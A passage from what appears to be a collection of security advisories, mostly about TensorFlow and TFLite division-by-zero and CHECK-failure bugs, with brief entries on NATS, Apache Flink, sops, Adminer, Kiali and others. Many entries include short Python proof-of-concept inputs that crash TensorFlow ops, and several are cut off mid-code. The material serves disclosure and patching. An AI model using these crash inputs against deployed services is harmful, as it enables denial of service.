mean = tf.constant([0.0], shape=[1], dtype=tf.float32)
variance = tf.constant([0.0], shape=[1], dtype=tf.float32)
epsilon = 0.0
exponential_avg_factor = 0.0
data_format = "NHWC"
is_training = False
tf.raw_ops.FusedBatchNorm(
    x=x, scale=scale, offset=offset, mean=mean, variance=variance,
    epsilon=epsilon, exponential_avg_factor=exponential_avg_factor,
    data_format=data_format, is_training=is_training)
```

If the tensors are empty, the …
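A minimal caller-side sketch, assuming NHWC layout as in the snippet above (the helper is hypothetical, not TensorFlow's patch), is to require every per-channel tensor to have exactly as many elements as `x` has channels:

```python
import tensorflow as tf

def checked_fused_batch_norm(x, scale, offset, mean, variance, **kwargs):
    # The reproduction above passes size-1 tensors against 6 channels; in NHWC
    # layout the per-channel tensors must match the last dimension of x.
    channels = x.shape[-1]
    for name, t in (("scale", scale), ("offset", offset),
                    ("mean", mean), ("variance", variance)):
        if int(tf.size(t)) != channels:
            raise ValueError(f"{name} must have {channels} elements, "
                             f"got {int(tf.size(t))}")
    return tf.raw_ops.FusedBatchNorm(x=x, scale=scale, offset=offset,
                                     mean=mean, variance=variance, **kwargs)
```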

github.com/nats-io/nats-server/ Import token permissions checking not enforced

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2021-3127.txt) Problem Description The NATS server provides for Subjects which are namespaced by Account; all Subjects are supposed to be private to an account, with an Export/Import system used to grant cross-account access to some Subjects. Some Exports are public, such that anyone can import the relevant subjects, and some Exports are private, such that the Import requires a token JWT to prove permission. The JWT …

Division by zero in TFLite's implementation of `TransposeConv`

The optimized implementation of the TransposeConv TFLite operator is vulnerable to a division by zero error:

```cpp
int height_col = (height + pad_t + pad_b - filter_h) / stride_h + 1;
int width_col = (width + pad_l + pad_r - filter_w) / stride_w + 1;
```

An attacker can craft a model such that the stride_{h,w} values are 0. Code calling this function must validate these arguments.

Division by zero in TFLite's implementation of `SpaceToDepth`

The Prepare step of the SpaceToDepth TFLite operator does not check for 0 before division:

```cpp
const int block_size = params->block_size;
const int input_height = input->dims->data[1];
const int input_width = input->dims->data[2];
int output_height = input_height / block_size;
int output_width = input_width / block_size;
```

An attacker can craft a model such that params->block_size would be zero.

Division by zero in TFLite's implementation of `SpaceToBatchNd`

The implementation of the SpaceToBatchNd TFLite operator is vulnerable to a division by zero error:

```cpp
TF_LITE_ENSURE_EQ(context, final_dim_size % block_shape[dim], 0);
output_size->data[dim + 1] = final_dim_size / block_shape[dim];
```

An attacker can craft a model such that one dimension of the block input is 0. Hence, the corresponding value in block_shape is 0.

Division by zero in TFLite's implementation of `OneHot`

The implementation of the OneHot TFLite operator is vulnerable to a division by zero error:

```cpp
int prefix_dim_size = 1;
for (int i = 0; i < op_context.axis; ++i) {
  prefix_dim_size *= op_context.indices->dims->data[i];
}
const int suffix_dim_size = NumElements(op_context.indices) / prefix_dim_size;
```

An attacker can craft a model such that at least one of the dimensions of indices would be 0. In turn, the prefix_dim_size value would become 0.

Division by zero in TFLite's implementation of `GatherNd`

The reference implementation of the GatherNd TFLite operator is vulnerable to a division by zero error:

```cpp
ret.dims_to_count[i] = remain_flat_size / params_shape.Dims(i);
```

An attacker can craft a model such that the params input would be an empty tensor. In turn, params_shape.Dims(.) would be zero, in at least one dimension.

Division by zero in TFLite's implementation of `DepthToSpace`

The implementation of the DepthToSpace TFLite operator is vulnerable to a division by zero error:

```cpp
const int block_size = params->block_size;
…
const int input_channels = input->dims->data[3];
…
int output_channels = input_channels / block_size / block_size;
```

An attacker can craft a model such that params->block_size is 0.

Division by zero in TFLite's implementation of `BatchToSpaceNd`

The implementation of the BatchToSpaceNd TFLite operator is vulnerable to a division by zero error:

```cpp
TF_LITE_ENSURE_EQ(context, output_batch_size % block_shape[dim], 0);
output_batch_size = output_batch_size / block_shape[dim];
```

An attacker can craft a model such that one dimension of the block input is 0. Hence, the corresponding value in block_shape is 0.

Division by zero in padding computation in TFLite

The TFLite computation for the size of the output after padding, ComputeOutSize, does not check that the stride argument is not 0 before doing the division:

```cpp
inline int ComputeOutSize(TfLitePadding padding, int image_size, int filter_size,
                          int stride, int dilation_rate = 1) {
  int effective_filter_size = (filter_size - 1) * dilation_rate + 1;
  switch (padding) {
    case kTfLitePaddingSame:
      return (image_size + stride - 1) / stride;
    case kTfLitePaddingValid:
      return (image_size + stride - effective_filter_size) …
```

Division by zero in `Conv3D`

A malicious user could trigger a division by 0 in the Conv3D implementation:

```python
import tensorflow as tf

input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32)
filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32)
tf.raw_ops.Conv3D(
    input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1],
    padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1])
```
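A minimal caller-side guard, sketched below with an illustrative helper name (this is not the upstream fix), simply refuses empty operands of the kind used above:

```python
import tensorflow as tf

def checked_conv3d(input, filter, **kwargs):
    # The division by zero above is reached with all-zero shapes; refuse any
    # input or filter tensor that has a zero-sized dimension.
    if 0 in input.shape or 0 in filter.shape:
        raise ValueError(f"empty tensors are not valid Conv3D arguments: "
                         f"input {input.shape}, filter {filter.shape}")
    return tf.raw_ops.Conv3D(input=input, filter=filter, **kwargs)
```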

Division by zero in `Conv2DBackpropFilter`

An attacker can cause a division by zero to occur in Conv2DBackpropFilter:

```python
import tensorflow as tf

input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
filter_sizes = tf.constant([0, 0, 0, 0], shape=[4], dtype=tf.int32)
out_backprop = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
tf.raw_ops.Conv2DBackpropFilter(
    input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop,
    strides=[1, 1, 1, 1], use_cudnn_on_gpu=False, padding='SAME',
    explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])
```

Division by 0 in `SparseMatMul`

An attacker can cause a denial of service via an FPE runtime error in tf.raw_ops.SparseMatMul:

```python
import tensorflow as tf

a = tf.constant([100.0, 100.0, 100.0, 100.0], shape=[2, 2], dtype=tf.float32)
b = tf.constant([], shape=[0, 2], dtype=tf.float32)
tf.raw_ops.SparseMatMul(
    a=a, b=b, transpose_a=True, transpose_b=True,
    a_is_sparse=True, b_is_sparse=True)
```

The division by 0 occurs deep in Eigen code because the b tensor is empty.
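A minimal caller-side sketch (illustrative helper, not the upstream fix) rejects empty operands before Eigen ever sees them:

```python
import tensorflow as tf

def checked_sparse_mat_mul(a, b, **kwargs):
    # The FPE above comes from an empty `b`; reject operands with any
    # zero-sized dimension.
    if 0 in a.shape or 0 in b.shape:
        raise ValueError(f"empty operands: a {a.shape}, b {b.shape}")
    return tf.raw_ops.SparseMatMul(a=a, b=b, **kwargs)
```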

Division by 0 in `Reverse`

An attacker can cause a denial of service via an FPE runtime error in tf.raw_ops.Reverse:

```python
import tensorflow as tf

tensor_input = tf.constant([], shape=[0, 1, 1], dtype=tf.int32)
dims = tf.constant([False, True, False], shape=[3], dtype=tf.bool)
tf.raw_ops.Reverse(tensor=tensor_input, dims=dims)
```

Division by 0 in `QuantizedMul`

An attacker can trigger a division by 0 in tf.raw_ops.QuantizedMul:

```python
import tensorflow as tf

x = tf.zeros([4, 1], dtype=tf.quint8)
y = tf.constant([], dtype=tf.quint8)
min_x = tf.constant(0.0)
max_x = tf.constant(0.0010000000474974513)
min_y = tf.constant(0.0)
max_y = tf.constant(0.0010000000474974513)
tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)
```

Division by 0 in `QuantizedConv2D`

An attacker can trigger a division by 0 in tf.raw_ops.QuantizedConv2D:

```python
import tensorflow as tf

input = tf.zeros([1, 1, 1, 1], dtype=tf.quint8)
filter = tf.constant([], shape=[1, 0, 1, 1], dtype=tf.quint8)
min_input = tf.constant(0.0)
max_input = tf.constant(0.0001)
min_filter = tf.constant(0.0)
max_filter = tf.constant(0.0001)
strides = [1, 1, 1, 1]
padding = "SAME"
```

Division by 0 in `QuantizedBiasAdd`

An attacker can trigger undefined behavior via an integer division by zero in tf.raw_ops.QuantizedBiasAdd:

```python
import tensorflow as tf

input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8)
bias = tf.constant([], shape=[0], dtype=tf.quint8)
min_input = tf.constant(-10.0, dtype=tf.float32)
max_input = tf.constant(-10.0, dtype=tf.float32)
min_bias = tf.constant(-10.0, dtype=tf.float32)
max_bias = tf.constant(-10.0, dtype=tf.float32)
tf.raw_ops.QuantizedBiasAdd(
    input=input_tensor, bias=bias, min_input=min_input, max_input=max_input,
    min_bias=min_bias, max_bias=max_bias, out_type=tf.qint32)
```
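A minimal caller-side sketch (the helper name is illustrative, not TensorFlow's patch) requires both the input and the bias to be non-empty before invoking the op:

```python
import tensorflow as tf

def checked_quantized_bias_add(input, bias, **kwargs):
    # The reproduction above passes completely empty tensors; require at least
    # one element in both the input and the bias.
    if int(tf.size(input)) == 0 or int(tf.size(bias)) == 0:
        raise ValueError("input and bias must be non-empty")
    return tf.raw_ops.QuantizedBiasAdd(input=input, bias=bias, **kwargs)
```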

Division by 0 in `QuantizedBatchNormWithGlobalNormalization`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization:

```python
import tensorflow as tf

t = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8)
t_min = tf.constant(-10.0, dtype=tf.float32)
t_max = tf.constant(-10.0, dtype=tf.float32)
m = tf.constant([], shape=[0], dtype=tf.quint8)
m_min = tf.constant(-10.0, dtype=tf.float32)
m_max = tf.constant(-10.0, dtype=tf.float32)
v = tf.constant([], shape=[0], dtype=tf.quint8)
v_min = tf.constant(-10.0, dtype=tf.float32)
v_max = tf.constant(-10.0, dtype=tf.float32)
beta = tf.constant([], shape=[0], dtype=tf.quint8)
beta_min = tf.constant(-10.0, …
```

Division by 0 in `QuantizedAdd`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedAdd:

```python
import tensorflow as tf

x = tf.constant([68, 228], shape=[2, 1], dtype=tf.quint8)
y = tf.constant([], shape=[2, 0], dtype=tf.quint8)
min_x = tf.constant(10.723421015884028)
max_x = tf.constant(15.19578006631113)
min_y = tf.constant(-5.539003866682977)
max_y = tf.constant(42.18819949559947)
tf.raw_ops.QuantizedAdd(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)
```

Division by 0 in `MaxPoolGradWithArgmax`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax is vulnerable to a division by 0:

```python
import tensorflow as tf

input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
argmax = tf.constant([], shape=[0], dtype=tf.int64)
ksize = [1, 1, 1, 1]
strides = [1, 1, 1, 1]
tf.raw_ops.MaxPoolGradWithArgmax(
    input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides,
    padding='SAME', include_batch_in_index=False)
```
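A minimal caller-side sketch (illustrative helper, not the upstream fix) rejects the empty tensors used above before the op is called:

```python
import tensorflow as tf

def checked_max_pool_grad_with_argmax(input, grad, argmax, **kwargs):
    # The division by zero above requires empty tensors; insist that every
    # argument carries at least one element.
    for name, t in (("input", input), ("grad", grad), ("argmax", argmax)):
        if int(tf.size(t)) == 0:
            raise ValueError(f"{name} must be non-empty")
    return tf.raw_ops.MaxPoolGradWithArgmax(input=input, grad=grad,
                                            argmax=argmax, **kwargs)
```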

Division by 0 in `FusedBatchNorm`

An attacker can cause a denial of service via an FPE runtime error in tf.raw_ops.FusedBatchNorm:

```python
import tensorflow as tf

x = tf.constant([], shape=[1, 1, 1, 0], dtype=tf.float32)
scale = tf.constant([], shape=[0], dtype=tf.float32)
offset = tf.constant([], shape=[0], dtype=tf.float32)
mean = tf.constant([], shape=[0], dtype=tf.float32)
variance = tf.constant([], shape=[0], dtype=tf.float32)
epsilon = 0.0
exponential_avg_factor = 0.0
data_format = "NHWC"
is_training = False
tf.raw_ops.FusedBatchNorm(
    x=x, scale=scale, offset=offset, mean=mean, variance=variance,
    epsilon=epsilon, exponential_avg_factor=exponential_avg_factor,
    data_format=data_format, is_training=is_training)
```

Division by 0 in `FractionalAvgPool`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.FractionalAvgPool:

```python
import tensorflow as tf

value = tf.constant([60], shape=[1, 1, 1, 1], dtype=tf.int32)
pooling_ratio = [1.0, 1.0000014345305555, 1.0, 1.0]
pseudo_random = False
overlapping = False
deterministic = False
seed = 0
seed2 = 0
tf.raw_ops.FractionalAvgPool(
    value=value, pooling_ratio=pooling_ratio, pseudo_random=pseudo_random,
    overlapping=overlapping, deterministic=deterministic, seed=seed, seed2=seed2)
```
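A rough caller-side sketch follows; it assumes (approximately) that each output dimension is the floor of the input dimension divided by the pooling ratio, and the helper name is illustrative rather than TensorFlow's actual fix:

```python
import math
import tensorflow as tf

def checked_fractional_avg_pool(value, pooling_ratio, **kwargs):
    # The division by zero above happens when a pooling ratio collapses a
    # dimension to zero output elements; reject such ratios up front.
    for dim, ratio in zip(value.shape, pooling_ratio):
        if math.floor(dim / ratio) < 1:
            raise ValueError(f"pooling_ratio {ratio} collapses dimension {dim}")
    return tf.raw_ops.FractionalAvgPool(value=value, pooling_ratio=pooling_ratio,
                                        **kwargs)
```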

Division by 0 in `DenseCountSparseOutput`

An attacker can cause a denial of service via an FPE runtime error in tf.raw_ops.DenseCountSparseOutput:

```python
import tensorflow as tf

values = tf.constant([], shape=[0, 0], dtype=tf.int64)
weights = tf.constant([])
tf.raw_ops.DenseCountSparseOutput(
    values=values, weights=weights, minlength=-1, maxlength=58, binary_output=True)
```

Division by 0 in `Conv3DBackprop*`

The tf.raw_ops.Conv3DBackprop* operations fail to validate that the input tensors are not empty. In turn, this would result in a division by 0:

```python
import tensorflow as tf

input_sizes = tf.constant([0, 0, 0, 0, 0], shape=[5], dtype=tf.int32)
filter_tensor = tf.constant([], shape=[0, 0, 0, 1, 0], dtype=tf.float32)
out_backprop = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32)
tf.raw_ops.Conv3DBackpropInputV2(
    input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop,
    strides=[1, 1, 1, 1, 1], padding='SAME', data_format='NDHWC',
    dilations=[1, 1, 1, 1, 1])
import …
```

Division by 0 in `Conv2DBackpropInput`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropInput:

```python
import tensorflow as tf

input_tensor = tf.constant([52, 1, 1, 5], shape=[4], dtype=tf.int32)
filter_tensor = tf.constant([], shape=[0, 1, 5, 0], dtype=tf.float32)
out_backprop = tf.constant([], shape=[52, 1, 1, 0], dtype=tf.float32)
tf.raw_ops.Conv2DBackpropInput(
    input_sizes=input_tensor, filter=filter_tensor, out_backprop=out_backprop,
    strides=[1, 1, 1, 1], use_cudnn_on_gpu=True, padding='SAME',
    explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])
```

Division by 0 in `Conv2DBackpropFilter`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropFilter:

```python
import tensorflow as tf

input_tensor = tf.constant([], shape=[0, 0, 1, 0], dtype=tf.float32)
filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32)
out_backprop = tf.constant([], shape=[0, 0, 1, 1], dtype=tf.float32)
tf.raw_ops.Conv2DBackpropFilter(
    input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop,
    strides=[1, 66, 18, 1], use_cudnn_on_gpu=True, padding='SAME',
    explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])
```

Division by 0 in `Conv2D`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2D:

```python
import tensorflow as tf

input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
filter = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
strides = [1, 1, 1, 1]
padding = "SAME"
tf.raw_ops.Conv2D(input=input, filter=filter, strides=strides, padding=padding)
```

Divide By Zero

TensorFlow is an end-to-end open source platform for machine learning. The TFLite implementation of hashtable lookup is vulnerable to a division by zero error. An attacker can craft a model such that the first dimension of `values` would be 0. The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in …

Divide By Zero

TensorFlow is an end-to-end open source platform for machine learning. An attacker can cause a denial of service via an FPE runtime error in tf.raw_ops.SparseMatMul. The division by 0 occurs deep in Eigen code because the b tensor is empty. The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and …

Command injection in Apache Flink

A vulnerability in Apache Flink (1.1.0 to 1.1.5, 1.2.0 to 1.2.1, 1.3.0 to 1.3.3, 1.4.0 to 1.4.2, 1.5.0 to 1.5.6, 1.6.0 to 1.6.4, 1.7.0 to 1.7.2, 1.8.0 to 1.8.3, 1.9.0 to 1.9.2, 1.10.0): when a process runs with JMXReporter enabled and a port configured via metrics.reporter.<reporter_name>.port, an attacker with local access to the machine and the JMX port can execute a man-in-the-middle attack using a specially crafted request to …

CHECK-failure in `UnsortedSegmentJoin`

An attacker can cause a denial of service by controlling the values of the num_segments tensor argument for UnsortedSegmentJoin:

```python
import tensorflow as tf

inputs = tf.constant([], dtype=tf.string)
segment_ids = tf.constant([], dtype=tf.int32)
num_segments = tf.constant([], dtype=tf.int32)
separator = ''
tf.raw_ops.UnsortedSegmentJoin(
    inputs=inputs, segment_ids=segment_ids, num_segments=num_segments,
    separator=separator)
```
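A minimal caller-side sketch (illustrative helper, not the upstream fix) requires `num_segments` to be a non-negative scalar before the op is invoked:

```python
import tensorflow as tf

def checked_unsorted_segment_join(inputs, segment_ids, num_segments, separator):
    # The CHECK-failure above is driven by an empty num_segments tensor; it
    # must be a scalar holding a non-negative value.
    if int(tf.size(num_segments)) != 1 or int(tf.reshape(num_segments, [])) < 0:
        raise ValueError("num_segments must be a non-negative scalar")
    return tf.raw_ops.UnsortedSegmentJoin(inputs=inputs, segment_ids=segment_ids,
                                          num_segments=num_segments,
                                          separator=separator)
```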

CHECK-fail in tf.raw_ops.EncodePng

An attacker can trigger a CHECK fail in PNG encoding by providing an empty input tensor as the pixel data:

```python
import tensorflow as tf

image = tf.zeros([0, 0, 3])
image = tf.cast(image, dtype=tf.uint8)
tf.raw_ops.EncodePng(image=image)
```
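A minimal caller-side sketch (illustrative helper, not the upstream fix) rejects empty pixel data instead of letting the CHECK abort the process:

```python
import tensorflow as tf

def checked_encode_png(image):
    # PNG encoding cannot handle an image with zero-sized height or width;
    # refuse empty pixel data before reaching the op.
    if 0 in image.shape:
        raise ValueError(f"image must be non-empty, got shape {image.shape}")
    return tf.raw_ops.EncodePng(image=image)
```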

CHECK-fail in SparseCross due to type confusion

The API of tf.raw_ops.SparseCross allows combinations which would result in a CHECK-failure and denial of service:

```python
import tensorflow as tf

hashed_output = False
num_buckets = 1949315406
hash_key = 1869835877
out_type = tf.string
internal_type = tf.string
indices_1 = tf.constant([0, 6], shape=[1, 2], dtype=tf.int64)
indices_2 = tf.constant([0, 0], shape=[1, 2], dtype=tf.int64)
indices = [indices_1, indices_2]
values_1 = tf.constant([0], dtype=tf.int64)
values_2 = tf.constant([72], dtype=tf.int64)
values = [values_1, values_2]
batch_size = 4
shape_1 = …
```

CHECK-fail in SparseConcat

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.SparseConcat:

```python
import tensorflow as tf
import numpy as np

indices_1 = tf.constant([[514, 514], [514, 514]], dtype=tf.int64)
indices_2 = tf.constant([[514, 530], [599, 877]], dtype=tf.int64)
indices = [indices_1, indices_2]
values_1 = tf.zeros([0], dtype=tf.int64)
values_2 = tf.zeros([0], dtype=tf.int64)
values = [values_1, values_2]
shape_1 = tf.constant([442, 514, 514, 515, 606, 347, 943, 61, 2], dtype=tf.int64)
shape_2 = tf.zeros([9], dtype=tf.int64)
shapes = [shape_1, …
```

CHECK-fail in DrawBoundingBoxes

An attacker can trigger a denial of service via a CHECK failure by passing an empty image to tf.raw_ops.DrawBoundingBoxes:

```python
import tensorflow as tf

images = tf.fill([53, 0, 48, 1], 0.)
boxes = tf.fill([53, 31, 4], 0.)
boxes = tf.Variable(boxes)
boxes[0, 0, 0].assign(3.90621)
tf.raw_ops.DrawBoundingBoxes(images=images, boxes=boxes)
```
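A minimal caller-side sketch (illustrative helper, not the upstream fix) refuses image batches with a zero-sized dimension, like the one above with height 0:

```python
import tensorflow as tf

def checked_draw_bounding_boxes(images, boxes):
    # The CHECK failure above is reached with an image whose height is 0;
    # require every dimension of the image batch to be positive.
    if 0 in images.shape:
        raise ValueError(f"images must be non-empty, got shape {images.shape}")
    return tf.raw_ops.DrawBoundingBoxes(images=images, boxes=boxes)
```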

CHECK-fail in AddManySparseToTensorsMap

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.AddManySparseToTensorsMap:

    import tensorflow as tf
    import numpy as np

    sparse_indices = tf.constant(530, shape=[1, 1], dtype=tf.int64)
    sparse_values = tf.ones([1], dtype=tf.int64)
    shape = tf.Variable(tf.ones([55], dtype=tf.int64))
    shape[:8].assign(np.array([855, 901, 429, 892, 892, 852, 93, 96], dtype=np.int64))
    tf.raw_ops.AddManySparseToTensorsMap(sparse_indices=sparse_indices, sparse_values=sparse_values, sparse_shape=shape)

CHECK-fail in `tf.raw_ops.RFFT`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.RFFT:

    import tensorflow as tf

    inputs = tf.constant([1], shape=[1], dtype=tf.float32)
    fft_length = tf.constant([0], shape=[1], dtype=tf.int32)
    tf.raw_ops.RFFT(input=inputs, fft_length=fft_length)

The above example causes Eigen code to operate on an empty matrix. This triggers an assertion and causes program termination.

CHECK-fail in `tf.raw_ops.IRFFT`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.IRFFT:

    import tensorflow as tf

    values = [-10.0] * 130
    values[0] = -9.999999999999995
    inputs = tf.constant(values, shape=[10, 13], dtype=tf.float32)
    inputs = tf.cast(inputs, dtype=tf.complex64)
    fft_length = tf.constant([0], shape=[1], dtype=tf.int32)
    tf.raw_ops.IRFFT(input=inputs, fft_length=fft_length)

The above example causes Eigen code to operate on an empty matrix. This triggers an assertion and causes program termination.

CHECK-fail in `QuantizeAndDequantizeV4Grad`

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.QuantizeAndDequantizeV4Grad:

    import tensorflow as tf

    gradient_tensor = tf.constant([0.0], shape=[1])
    input_tensor = tf.constant([0.0], shape=[1])
    input_min = tf.constant([[0.0]], shape=[1, 1])
    input_max = tf.constant([[0.0]], shape=[1, 1])
    tf.raw_ops.QuantizeAndDequantizeV4Grad(
        gradients=gradient_tensor, input=input_tensor,
        input_min=input_min, input_max=input_max, axis=0)

CHECK-fail in `LoadAndRemapMatrix`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from tf.raw_ops.LoadAndRemapMatrix:

    import tensorflow as tf

    ckpt_path = tf.constant([], shape=[0], dtype=tf.string)
    old_tensor_name = tf.constant("")
    row_remapping = tf.constant([], shape=[0], dtype=tf.int64)
    col_remapping = tf.constant([1], shape=[1], dtype=tf.int64)
    initializing_values = tf.constant(1.0)
    tf.raw_ops.LoadAndRemapMatrix(
        ckpt_path=ckpt_path, old_tensor_name=old_tensor_name,
        row_remapping=row_remapping, col_remapping=col_remapping,
        initializing_values=initializing_values, num_rows=0, num_cols=1)

CHECK-fail in `CTCGreedyDecoder`

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.CTCGreedyDecoder:

    import tensorflow as tf

    inputs = tf.constant([], shape=[18, 2, 0], dtype=tf.float32)
    sequence_length = tf.constant([-100, 17], shape=[2], dtype=tf.int32)
    merge_repeated = False
    tf.raw_ops.CTCGreedyDecoder(inputs=inputs, sequence_length=sequence_length, merge_repeated=merge_repeated)

CHECK-fail due to integer overflow

An attacker can trigger a denial of service via a CHECK-fail caused by an integer overflow when constructing a new tensor shape:

    import tensorflow as tf

    input_layer = 2**60 - 1
    sparse_data = tf.raw_ops.SparseSplit(
        split_dim=1,
        indices=[(0, 0), (0, 1), (0, 2), (4, 3), (5, 0), (5, 1)],
        values=[1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
        shape=(input_layer, input_layer),
        num_split=2,
        name=None
    )
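
The arithmetic below (plain Python, no TensorFlow required) shows why such a shape cannot be represented: the element count of a (2**60 - 1) by (2**60 - 1) tensor does not fit in a signed 64-bit integer, which is presumably what pushes the shape-construction code into the failing CHECK.

    input_layer = 2**60 - 1
    int64_max = 2**63 - 1                          # largest signed 64-bit value
    print(input_layer * input_layer > int64_max)   # True: the element count overflows int64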

A failed upgrade may lead to hung goroutines

Impact Processes using tableflip may encounter hung goroutines in the parent process after a failed upgrade. The Go runtime has annoying behaviour around setting and clearing O_NONBLOCK: exec.Cmd.Start() ends up calling os.File.Fd() for any file in exec.Cmd.ExtraFiles. os.File.Fd() both disables the use of the runtime poller for the file and clears O_NONBLOCK from the underlying open file descriptor. This can lead to goroutines hanging in a parent process, after at …
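
For readers unfamiliar with O_NONBLOCK, the sketch below is a plain-Python stand-in for the OS behaviour described above (it is not tableflip or Go code): clearing the flag turns a read that would return immediately into one that blocks.

    import os

    r, w = os.pipe()
    os.set_blocking(r, False)          # set O_NONBLOCK on the read end
    try:
        os.read(r, 1)                  # empty pipe: returns immediately with an error
    except BlockingIOError:
        print("non-blocking read returned immediately")

    os.set_blocking(r, True)           # clear O_NONBLOCK again
    os.write(w, b"x")                  # without this write, the read below would block forever
    print(os.read(r, 1))               # b'x'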

Local directory executable lookup in sops (Windows-only)

Impact Windows users using the sops direct editor option (sops file.yaml) can have a local executable named vi, vim, or nano executed if running sops from cmd.exe. This attack is only viable if an attacker is able to place a malicious binary in the directory you are running sops from. In addition, this attack only works when using cmd.exe or the Windows C library SearchPath function. This is …

Information Exposure

This affects the package dns-packet. It creates buffers with allocUnsafe and does not always fill them before forming network packets. This can expose internal application memory over an unencrypted network when querying crafted invalid domain names.

Out-of-bounds Write

There is a flaw in the XML entity encoding functionality of libxml2. The most likely impact of this flaw is to application availability, with some potential impact to confidentiality and integrity if an attacker is able to use memory information to further exploit the application.

Denial of service due to improper input validation in third-party identifier endpoint

Impact Missing input validation of some parameters on the endpoints used to confirm third-party identifiers could cause excessive use of disk space and memory, leading to resource exhaustion. Patches The issue is fixed by https://github.com/matrix-org/synapse/pull/9855. Workarounds There are no known workarounds. References n/a For more information If you have any questions or comments about this advisory, email us at security@matrix.org.
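
As a generic illustration of the missing check (a hypothetical sketch, not Synapse's actual code or parameter names), bounding the size of client-supplied fields before they are processed or stored is usually enough to prevent this class of resource exhaustion:

    MAX_FIELD_LENGTH = 512  # hypothetical limit

    def validate_threepid_params(params):
        # Reject oversized client-supplied values before any further
        # processing or storage happens.
        for name, value in params.items():
            if len(str(value)) > MAX_FIELD_LENGTH:
                raise ValueError(f"parameter {name!r} exceeds {MAX_FIELD_LENGTH} characters")
        return params

    validate_threepid_params({"client_secret": "abc", "email": "user@example.com"})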

Cross-site Scripting

Adminer is open-source database management software. A cross-site scripting vulnerability in Adminer affects users of MySQL, MariaDB, PgSQL, and SQLite. XSS is in most cases prevented by the strict CSP in all modern browsers. The only exception is when Adminer uses a pdo_ extension to communicate with the database (this is used if the native extensions are not enabled). In browsers without CSP, the affected versions of Adminer are vulnerable. As a …
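
The usual fix for this class of issue is output encoding. The snippet below is a generic Python illustration of the principle (Adminer itself is written in PHP; none of this is Adminer's code): any database-controlled value reflected into HTML must be escaped before rendering.

    import html

    def render_error(db_message):
        # Escape <, >, & and quotes so a crafted message cannot inject markup.
        return '<p class="error">{}</p>'.format(html.escape(db_message))

    print(render_error('<script>alert(1)</script>'))
    # <p class="error">&lt;script&gt;alert(1)&lt;/script&gt;</p>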

Use of Hard-coded Credentials

A hard-coded cryptographic key vulnerability in the default configuration file was found in Kiali, all versions prior to 1.15.1. A remote attacker could abuse this flaw by creating their own JWT signed tokens and bypass Kiali authentication mechanisms, possibly gaining privileges to view and alter the Istio configuration.
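
A shared, hard-coded signing key means anyone who reads the default configuration can mint tokens the server will accept. The sketch below uses the PyJWT library to show the idea; the key value and claims are made up for illustration and are not Kiali's actual defaults.

    import jwt  # PyJWT

    LEAKED_DEFAULT_KEY = "default-signing-key"  # hypothetical value from a shipped config file

    # An attacker who knows the key can forge an arbitrary token ...
    forged = jwt.encode({"sub": "admin", "iss": "kiali-login"}, LEAKED_DEFAULT_KEY, algorithm="HS256")

    # ... and the server, verifying with the same shared key, will accept it.
    claims = jwt.decode(forged, LEAKED_DEFAULT_KEY, algorithms=["HS256"])
    print(claims["sub"])  # 'admin'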